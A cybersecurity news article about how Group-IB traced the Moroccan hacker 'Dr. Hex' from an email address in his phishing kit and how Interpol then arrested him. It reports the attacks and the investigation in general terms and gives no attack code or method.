Operation Lyrebird Leads to the Arrest of Moroccan Hacker “Dr. Hex”

• Group-IB has managed to identify a careless hacker who was using the same email address on multiple platforms.
• The firm conducted a two-year investigation and shared its findings with Interpol agents.
• The hacker was confirmed to be behind defacements, phishing attacks, and the stealing of card details.

Interpol has received valuable information from Group-IB and managed to locate and arrest a Moroccan hacker using the nickname “Dr. Hex” (among others). The person is considered responsible for multiple cyber-attacks against French banks, French IT firms, and several high-profile organizations in the European country. The main trick used by the hacker was a phishing kit with which he created several phishing websites to steal valuable bank system user credentials.

Group-IB managed to analyze this kit and investigated the email address hardcoded in it. Using this lead, the researchers found a YouTube channel that contained links to an Arabic crowd-funding platform. This, in turn, led to a full name, and then to a DNS analysis, then to another two domains registered under that name. Eventually, the circle was closed by discovering the website had been built using the same phishing kit.

The researchers connected the hacker with five more email addresses, found infrastructure traces, linked him with specific campaigns, and also found more accounts on YouTube, Facebook, Instagram, and Skype, all belonging to him. Having a complete record of his digital footprint spanning from 2009 to 2018, Interpol was able to coordinate with the Moroccan police and arrested the suspect last month.

As Group-IB’s CTO, Dmitry Volkov, stated about this success:

“Dr. Hex” is now facing several charges relating to 130 website defacements, phishing, malware development, fraud, and carding activities that affected thousands of victims. This should incur several years in prison as well as a hefty fine for the man.

Back in March 2020, we covered a similar story about a careless Moroccan hacker targeting large French firms using an email address connected to his real identity, his physical business, and several social media accounts. Maybe OpSec mishandling is a thing among Moroccan hackers, as the two don’t appear to be linked in any way.